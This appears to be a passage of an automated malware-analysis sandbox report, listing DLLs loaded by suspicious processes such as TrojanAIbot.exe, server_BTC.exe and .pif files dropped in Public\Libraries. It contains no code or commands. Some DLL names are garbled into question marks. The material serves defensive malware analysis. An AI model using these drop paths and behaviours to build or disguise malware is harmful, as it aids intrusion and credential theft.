Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: wldp.dll Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: propsys.dll Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: profapi.dll Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: edputil.dll Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: netutils.dll Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: slc.dll Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: userenv.dll Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: sppc.dll Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: linkinfo.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: ntshrui.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: cscapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\timeout.exe Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: gpapi.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: apphelp.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: version.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: uxtheme.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: url.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: ieframe.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: iertutil.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: netapi32.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: userenv.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: winhttp.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: wkscli.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: netutils.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: spp.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: vssapi.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: vsstrace.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: dbghelp.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: winmm.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: wininet.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: sspicli.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: windows.storage.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: wldp.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: profapi.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: kernel.appcore.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: ieproxy.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: ieproxy.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: ieproxy.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: mssip32.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: mssip32.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: mssip32.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: mswsock.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: smartscreenps.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: smartscreenps.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: smartscreenps.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: iphlpapi.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: winnsi.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: ???.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: ???.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: ???.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: am.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: ?.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: ?.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: ????.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: ???e???????????.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: ???e???????????.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: ?.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: ?.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: ?.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: ?.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: tquery.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: cryptdll.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: mssip32.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: endpointdlp.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: endpointdlp.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: endpointdlp.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: endpointdlp.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: sppwmi.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: slc.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: sppcext.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: winscard.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: devobj.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: cryptsp.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: rsaenh.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: cryptbase.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Wisrysxl.PIF Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: winhttp.dll
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: mpr.dll
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: secur32.dll
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: sspicli.dll
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: dnsapi.dll
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: iphlpapi.dll
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: windows.storage.dll
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: wldp.dll
Source: C:\Users\Public\Libraries\lxsyrsiW.pif Section loaded: ntmarta.dll
